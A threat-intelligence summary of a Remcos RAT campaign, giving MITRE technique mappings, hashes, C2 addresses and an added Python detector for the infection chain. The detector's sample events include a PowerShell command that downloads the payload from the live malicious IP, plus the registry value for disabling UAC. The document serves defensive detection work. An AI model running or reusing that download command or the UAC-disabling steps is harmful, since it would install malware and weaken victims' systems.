The Persistent Danger of Remcos RAT – CYFIRMA

Cyfirma analyzes a persistent Remcos RAT campaign driven by a broad infrastructure of malicious IPs and multi-stage payloads, delivering and controlling Remcos across compromised hosts. The report details how the attackers use PowerShell-enabled scripts, registry-based persistence, UAC bypass, keylogging, audio capture, and screen recording to exfiltrate data and maintain control, with activity tied to gaming-related targets. #RemcosRAT #NewRem #RiotGames #Cyfirma

Key Points

  • Remcos RAT campaigns are hosted on multiple malicious IPs, with 141.95.16.111:8080 highlighted as a primary delivery point for payloads like recover.bat and RiotGames.exe.
  • The recover.bat script uses PowerShell to download the second-stage payload (RiotGames.exe) from a remote location, enabling a multistage infection chain.
  • RiotGames.exe modifies the registry to disable UAC and uses auto-run registry keys to establish persistence.
  • Extracted configuration data reveals the C2 IP (141.95.16.111:2404), the botnet name (NewRem), and the mutex name, filenames, and directories the implant uses for its activities, from keylogging to screenshot capture.
  • Capabilities include keylogging, audio recording, desktop screenshot capture, and potential data exfiltration, raising privacy and credential theft concerns.
  • There is low-to-moderate confidence that the campaign targets gaming-related individuals, based on file names and referenced utilities masquerading as gaming-related tools.
  • The infrastructure is dynamic: threat actors frequently shift IPs/servers, host multiple malicious files, and use decoy/abused utilities to evade detection and persist over time.

MITRE Techniques

  • [T1566] Phishing – Initial access via malicious attachments, drive-by downloads, or social engineering tactics. “Remcos RAT is typically spread through malicious attachments, drive-by downloads, or social engineering tactics.”
  • [T1204.002] Malicious File – The campaign delivers and executes malicious payloads such as recover.bat and RiotGames.exe. “The ‘recover.bat’ script, executed upon infection, harnesses PowerShell to download the second-stage payload (‘RiotGames.exe’) from a remote location.”
  • [T1059.001] PowerShell – Execution via PowerShell to fetch and run the second-stage payload. “PowerShell to download the second-stage payload (‘RiotGames.exe’)”
  • [T1547.001] Registry Run Keys – Persistence via auto-run registry keys. “persistence by utilizing auto-run registry keys.”
  • [T1112] Modify Registry – Modifying registry entries to affect system behavior. “The RiotGames.exe binary modifies the registry to disable User Account Control (UAC).”
  • [T1548.002] Bypass User Account Control – Bypassing UAC prompts to operate with fewer restrictions. “Bypass UAC”
  • [T1083] File and Directory Discovery – Discovery of configuration data including C2 IP, botnet name, filenames, directories. “Extracted configuration data unveils critical details, including the C2 IP, botnet name, filenames, directories, and mutex name.”
  • [T1082] System Information Discovery – Inferring system details as part of reconnaissance. “botnet name (NewRem), filenames, directories, and mutex name” implies system/context awareness.
  • [T1113] Screen Capture – Taking desktop screenshots for monitoring. “screen capture”
  • [T1123] Audio Capture – Recording audio from the victim’s device. “audio recording capabilities”
  • [T1115] Clipboard Data – Accessing clipboard contents for sensitive data. “Clipboard data”
  • [T1056.001] Input Capture: Keylogging – Logging keystrokes for credential theft. “Keylogging”
  • [T1041] Exfiltration Over C2 Channel – Potential data exfiltration over the C2 channel. “data can be exfiltrated”
  • [T1071.001] Application Layer Protocol: Web Protocols – C2 communications over HTTP/Web protocols. “Application Layer Protocol: Web protocols”

Indicators of Compromise

  • [MD5 File Hash] recover.bat – 4388789C81AFD593C5FC2F0249502153
  • [MD5 File Hash] RiotGames.exe – 5379d703170770355efdbce86dcdb1d3
  • [MD5 File Hash] newpy.exe – b28167faf2bcf0150d5e816346abb42d
  • [MD5 File Hash] echo-4662-2DF5.exe – 25fca21c810a8ffabf4fdf3b1755c73c
  • [MD5 File Hash] 123.exe – 791545E6E3C5EB61DD12CCFBAE1B9982
  • [IP] 141.95.16.111 – C2
  • [IP] 145.95.16.111 – C2
  • [URL] http://geoplugin.net/json.gp – Geo-location service
  • [URL] http://141.95.16.111:8080/RiotGames.exe – Download location
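The following triage helper is an added example, not code from Cyfirma or from the report. It turns the infection-chain behaviours listed under Key Points (PowerShell fetching RiotGames.exe, EnableLUA set to 0, Run-key persistence, C2 traffic) and the hashes, IPs and URL above into a small detector that runs over simplified Sysmon-style event records. The event dictionaries, their field names and the sample events are constructed for this example; real Sysmon or EDR telemetry has different field names and would need a thin adapter.

```python
"""Triage helper for the Remcos RAT indicators and behaviours summarised above.

Added example (not Cyfirma's code). It scans constructed Sysmon-style event
records and flags:
  * file hashes, IPs and URLs matching the published IoCs,
  * the UAC tampering and Run-key persistence described in the report,
  * a PowerShell process fetching the second stage from the delivery URL.
Field names (type, image, cmdline, md5, target, data, dst_ip, dst_port)
are a simplified stand-in for real telemetry and are an assumption.
"""
import re
from typing import Dict, List

# IoCs taken from the report; hashes normalised to lower case for comparison.
IOC_MD5 = {
    "4388789c81afd593c5fc2f0249502153": "recover.bat",
    "5379d703170770355efdbce86dcdb1d3": "RiotGames.exe",
    "b28167faf2bcf0150d5e816346abb42d": "newpy.exe",
    "25fca21c810a8ffabf4fdf3b1755c73c": "echo-4662-2DF5.exe",
    "791545e6e3c5eb61dd12ccfbae1b9982": "123.exe",
}
IOC_IPS = {"141.95.16.111", "145.95.16.111"}
IOC_URLS = {"http://141.95.16.111:8080/RiotGames.exe"}

# Registry locations behind the behaviours the report describes.
UAC_VALUE = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA"
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)


def check_event(ev: Dict[str, str]) -> List[str]:
    """Return human-readable findings for one event (empty list if nothing matched)."""
    findings: List[str] = []
    kind = ev.get("type")
    if kind == "process":
        h = str(ev.get("md5", "")).lower()
        if h in IOC_MD5:
            findings.append(f"known Remcos hash ({IOC_MD5[h]}) executed: {ev.get('image')}")
        cmd = str(ev.get("cmdline", ""))
        # recover.bat behaviour: PowerShell pulling the second stage from the IoC URL
        if "powershell" in str(ev.get("image", "")).lower() and any(u in cmd for u in IOC_URLS):
            findings.append("PowerShell download of second-stage payload from IoC URL (T1059.001)")
    elif kind == "registry":
        target = str(ev.get("target", ""))
        data = str(ev.get("data", "")).strip()
        # Sysmon event 13 renders DWORD values as "DWORD (0x00000000)"
        if target.lower() == UAC_VALUE.lower() and data.endswith("(0x00000000)"):
            findings.append("UAC disabled via EnableLUA=0 (T1548.002 / T1112)")
        if RUN_KEY_RE.search(target):
            findings.append(f"Run-key persistence set: {target} -> {data} (T1547.001)")
    elif kind == "network":
        if ev.get("dst_ip") in IOC_IPS:
            findings.append(
                f"connection to Remcos C2/delivery IP {ev['dst_ip']}:{ev.get('dst_port')} (T1071.001)"
            )
    return findings


def triage(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Run check_event over every event; return {event_id: findings} for hits only."""
    hits: Dict[int, List[str]] = {}
    for ev in events:
        found = check_event(ev)
        if found:
            hits[int(ev["id"])] = found
    return hits


# Constructed sample telemetry mirroring the chain in the report.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "image": r"C:\Users\victim\AppData\Roaming\RiotGames.exe",
     "cmdline": "RiotGames.exe", "md5": "5379D703170770355EFDBCE86DCDB1D3"},
    {"id": 2, "type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c Invoke-WebRequest http://141.95.16.111:8080/RiotGames.exe "
                "-OutFile RiotGames.exe", "md5": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"},
    {"id": 3, "type": "registry", "target": UAC_VALUE, "data": "DWORD (0x00000000)"},
    {"id": 4, "type": "registry",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\RiotGames",
     "data": r"C:\Users\victim\AppData\Roaming\RiotGames.exe"},
    {"id": 5, "type": "network", "dst_ip": "141.95.16.111", "dst_port": "2404"},
    {"id": 6, "type": "process", "image": r"C:\Program Files\Google\Chrome\chrome.exe",
     "cmdline": "chrome.exe", "md5": "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"},
    {"id": 7, "type": "network", "dst_ip": "8.8.8.8", "dst_port": "53"},
]

if __name__ == "__main__":
    for event_id, found in sorted(triage(SAMPLE_EVENTS).items()):
        for line in found:
            print(f"event {event_id}: {line}")
```

Hash and IP matching alone is brittle because the report notes the actors rotate IPs and hosted files; the registry and PowerShell checks are the parts worth keeping as behavioural rules once the listed indicators have gone stale.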

Read more: https://www.cyfirma.com/outofband/the-persistent-danger-of-remcos-rat/